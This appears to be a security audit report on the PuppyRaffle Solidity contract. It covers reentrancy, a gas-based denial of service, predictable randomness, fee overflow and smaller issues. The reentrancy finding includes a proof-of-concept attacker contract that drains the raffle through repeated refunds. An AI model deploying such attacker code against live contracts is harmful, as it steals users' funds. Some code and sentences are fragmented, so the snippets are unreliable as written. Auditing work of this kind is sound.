Description: The PuppyRaffle::refund
function does not follow CEI
as a result, enables participants to drain the smart contract all of the money using reentrancy attack
In the PuppyRaffle::refund
function, we first make an external call to the msg.sender
address and only after making the external call do we update the PuppyRaffle::players
function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
@> payable(msg.sender).sendValue(entranceFee);
@> players[playerIndex] = address(0);
emit RaffleRefunded(playerAddress);
A player who has entered the raffle could have a fallback/receive
function that calls the PuppyRaffle::refund
function again and again claiming the refund till the contract is drained of all the money.
Impact: All fees paid by the raffle entrants could be stolen by the malicious participant.
Proof of Concept:
- Attacker enters the raffle
- Attacker sets up a contract with a
function that callsPuppyRaffle::refund
. - Attacker calls
from their attack contract, during the contract balance.
Proof of Code
function test_reentrancyRefund() public {
address[] memory players = new address[](4);
players[0] = playerOne;
players[1] = playerTwo;
players[2] = playerThree;
players[3] = playerFour;
puppyRaffle.enterRaffle{value: entranceFee * 4}(players);
ReentrancyAttacker attackerContract = new ReentrancyAttacker(puppyRaffle);
address attackUser = makeAddr("attackUser");, 1 ether);
uint256 startingAttackContractBalance = address(attackerContract).balance;
uint256 startingContractBalance = address(puppyRaffle).balance;
attackerContract.attack{value: entranceFee}();
console.log("starting balance of attacker contract", startingAttackContractBalance);
console.log("starting victim contract balance", startingContractBalance);
console.log("ending balance of attacker contract balance", address(attackerContract).balance);
console.log("ending balance of puppy raffle balance", address(puppyRaffle).balance);
Add this to contract as well
contract ReentrancyAttacker {
PuppyRaffle puppyRaffle;
uint256 entranceFee;
uint256 attackerIndex;
constructor(PuppyRaffle _puppyraffle) {
puppyRaffle = _puppyraffle;
entranceFee = puppyRaffle.entranceFee();
function attack() external payable {
address[] memory players = new address[](1);
players[0] = address(this);
puppyRaffle.enterRaffle{value: entranceFee}(players);
attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));
function _stealmoney() internal {
if (address(puppyRaffle).balance >= entranceFee) {
fallback() external payable {
receive() external payable {
Recommended Mitigation: To prevent this, we should have the PuppyRaffle::refund
function update the players
array before making the external call, additionally, we should move the event emission up as well.
function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
+ players[playerIndex] = address(0);
+ emit RaffleRefunded(playerAddress);
- players[playerIndex] = address(0);
- emit RaffleRefunded(playerAddress);
[H-2] Title Looping through players to check for duplicates in PuppyRaffle.sol::enterRaffle
is a potential Denial of service (DoS) attack, incrementing gas cost for future entrants
IMPACT: Medium/ Likelihood: Medium
Description: The Puppyraffle::enterRaffle
function loops through the player
array to check for duplicates.However, the longer the PuppyRaffle::players
array is, the more checks a new player who enter right when the raffle stats will be dramatically lower than those who enter later, every additional address in the players
array, is an additional check the loop will have to make.
Impact: The gas costs will greatly increase as more players enter the raffle. Discouraging later users from entering, and causing a rush at the start of the raffle to be one of the first entrants in the queue.
An attacker might make the PuppRaffle::entrants
array so big, that no one else enters, guaranteeing themselves the win.
Proof of Concept:
if we have 2 sets of 100 players enter, the gas costs will be as be as such
- 1st 100 players - 6252848 gas approximately
- 2nd 100 players - 10068138 gas approximately
This is more than 3x more than the first player
place the following test into `puppyRaffleTest.t.solfunction testCanEnterRaffle() public {
address[] memory players = new address[](1);
players[0] = playerOne;
puppyRaffle.enterRaffle{value: entranceFee}(players);
assertEq(puppyRaffle.players(0), playerOne);
function testMoreGasIsNeededToEnterRaffle() public {
address[] memory players = new address[](100);
for (uint256 i = 0; i < 100; i++) {
players[i] = address(i);
uint256 gastart = gasleft();
puppyRaffle.enterRaffle{value: entranceFee * players.length}(players);
uint256 gasEnd = gasleft();
uint256 gasUsed = (gastart - gasEnd) * tx.gasprice;
console.log("Gas cost of the first 100 players", gasUsed);
address[] memory playersTwo = new address[](100);
for (uint256 i = 0; i < 100; i++) {
playersTwo[i] = address(i + 100);
uint256 gastartsecond = gasleft();
puppyRaffle.enterRaffle{value: entranceFee * players.length}(playersTwo);
uint256 gasEndsecond = gasleft();
uint256 gasUsedsecond = (gastartsecond - gasEndsecond) * tx.gasprice;
console.log("Gas cost of the first 100 players", gasUsedsecond);
assert(gasUsed < gasUsedsecond);
Recommended Mitigation: There are a few recommendations
- consider allowing duplicates Users can make new wallets addresses , so a duplicate check doesn't prevent the same person from entering multiple times, only the same wallet address.
- Consider using a mapping to check for duplicates. This would allow constant time looping of whether a user has already entered
- Use an enum of true and false , true already entered or false not yet entered.
Description Hashing msg.sender
, block.timestamp
and block.diffuclty
together creates a pedictable find number. A prdicatable number is not good random number. Malicious users can manipulate these values or know them ahead of time to choose the winner the raffle themselvers.
This means user could frontrun this function and call refund
if they see they are not the winner
Impact Any user can influence the winner of the raffle, winning the money and selecting the rarest
Proof of Concept
- Validators can know the variables used to there advantage,
- Users can mine/manipulate their
value to result in their address being used to generate the winner - Users can revert their
transaction if they dont like the winner or the resulting puppy. using on-chain values as randomness seed is a well documented vector in the blockchain course
Recommended Mitigation consider using a cryptographically provable random number generator such as VRF
In solidity versions prior to 0.8.0
integers were subject to integer overflows;
uint64 myvar = type(uint64).max
myvar = myvar + 1
// myvar will be 0
Impact In selectwinner
fees are accumalated for the feeaddrss to collect later in PuppyRaffle::withdrawFees
, However, if the totalFees
overflows, the feeaddress
may not collect the correct amount of fees leaving fees, permantely stuck in the contract.
Proof of Concept
function testTotalFeesOverflow() public playersEntered {
// We finish a raffle of 4 to collect some fees
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
uint256 startingTotalFees = puppyRaffle.totalFees();
// startingTotalFees = 800000000000000000
// We then have 89 players enter a new raffle
uint256 playersNum = 89;
address[] memory players = new address[](playersNum);
for (uint256 i = 0; i < playersNum; i++) {
players[i] = address(i);
puppyRaffle.enterRaffle{value: entranceFee * playersNum}(players);
// We end the raffle
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
// And here is where the issue occurs
// We will now have fewer fees even though we just finished a second raffle
uint256 endingTotalFees = puppyRaffle.totalFees();
console.log("ending total fees", endingTotalFees);
assert(endingTotalFees < startingTotalFees);
// We are also unable to withdraw any fees because of the require check
vm.expectRevert("PuppyRaffle: There are currently players active!");
- we conclude a raffle of 4 players
- we then have 89 players enter a new raffle, and conlude the raffle totalees will overflow
- you will not be able to withdraw fees from the contract. Recommended Mitigation
- Use a newer version of solidity and uint256 instead of uint64
- you could use the
library of OpenZeppilin for versions 07.6 of solidity, however you would still have a hard time with theuint64
[M-4] Smart Contract wallet raffle winners without a receive
or a fallback
will block the start of a new contest
Description: The PuppyRaffle::selectWinner
function is responsible for resetting the lottery. However, if the winner is a smart contract wallet that rejects payment, the lottery would not be able to restart.
Non-smart contract wallet users could reenter, but it might cost them a lot of gas due to the duplicate check.
Impact: The PuppyRaffle::selectWinner
function could revert many times, and make it very difficult to reset the lottery, preventing a new one from starting.
Also, true winners would not be able to get paid out, and someone else would win their money!
Proof of Concept:
- 10 smart contract wallets enter the lottery without a fallback or receive function.
- The lottery ends
- The
function wouldn't work, even though the lottery is over!
Recommended Mitigation: There are a few options to mitigate this issue.
- Do not allow smart contract wallet entrants (not recommended)
- Create a mapping of addresses -> payout so winners can pull their funds out themselves, putting the owness on the winner to claim their prize. (Recommended)
[L-1] PuppyRaffle::getActivePlayerIndex
returns 0 for non-existent and for players at index 0, causing a player at index 0 to incorrectly think they have not entered the raffle
Description: If a player is in the PuppyRaffle::Players
array at index 0 the player may not collaborate in the raffle since 0 is returned for inactive players
Proof of Concept:
function getActivePlayerIndex(address player) external view returns (uint256) {
for (uint256 i = 0; i < players.length; i++) {
if (players[i] == player) {
return i;
return 0;
Impact: The player at location zero is going to be marked inactive wasting gas
Recommended Mitigation:
- avoid returning zero for that an index of a player, rather return true or false
Reading from storage is much more expensive than reading from a constant or immutable
should be immutable
should be constant
should be constant
should be constant
[G-2]: unused loop reading from the storage is more expensive than reading from caching PuppyRaffle::enterRaffle
for (uint256 i = 0; i < players.length - 1; i++) {
for (uint256 j = i + 1; j < players.length; j++) {
require(players[i] != players[j], "PuppyRaffle: Duplicate player");
use a cache to store the length of the players
uint256 length = players.length;
Consider using a specific version of Solidity in your contracts instead of a wide version. For example, instead of pragma solidity ^0.8.0;
, use pragma solidity 0.8.0;
- Found in src/PuppyRaffle.sol Line: 2
- see slither recommendations
Assigning values to address state variables without checking for address(0)
Found in src/PuppyRaffle.sol Line: 64
feeAddress = _feeAddress;
Found in src/PuppyRaffle.sol Line: 173
previousWinner = winner; // e vanity, doesn't matter much.
Found in src/PuppyRaffle.sol Line: 193
feeAddress = newFeeAddress;
Description: The test coverage of the tests are below 90%. This often means that there are parts of the code that are not tested.
| File | % Lines | % Statements | % Branches | % Funcs |
| ---------------------------------- | -------------- | -------------- | -------------- | ------------- |
| script/DeployPuppyRaffle.sol | 0.00% (0/3) | 0.00% (0/4) | 100.00% (0/0) | 0.00% (0/1) |
| src/PuppyRaffle.sol | 82.46% (47/57) | 83.75% (67/80) | 66.67% (20/30) | 77.78% (7/9) |
| test/auditTests/ProofOfCodes.t.sol | 100.00% (7/7) | 100.00% (8/8) | 50.00% (1/2) | 100.00% (2/2) |
| Total | 80.60% (54/67) | 81.52% (75/92) | 65.62% (21/32) | 75.00% (9/12) |
Recommended Mitigation: Increase test coverage to 90% or higher, especially for the Branches
Description following CEI is best practise to avoid being rekt by not changing states {effects} before interactions{depositing, withdrawing } Impact
- (bool success,) ={value: prizePool}("");
- require(success, "PuppyRaffle: Failed to send prize pool to winner");
_safeMint(winner, tokenId);
+ (bool success,) ={value: prizePool}("");
+ require(success, "PuppyRaffle: Failed to send prize pool to winner");
Proof of Concept CEI check Recommended Mitigation
follow CEI while updating state
Description it can be confusing to see number literal in a codebase, and it's much more readable if the numbers are give a name
Recommended Mitigation Instead you could use constants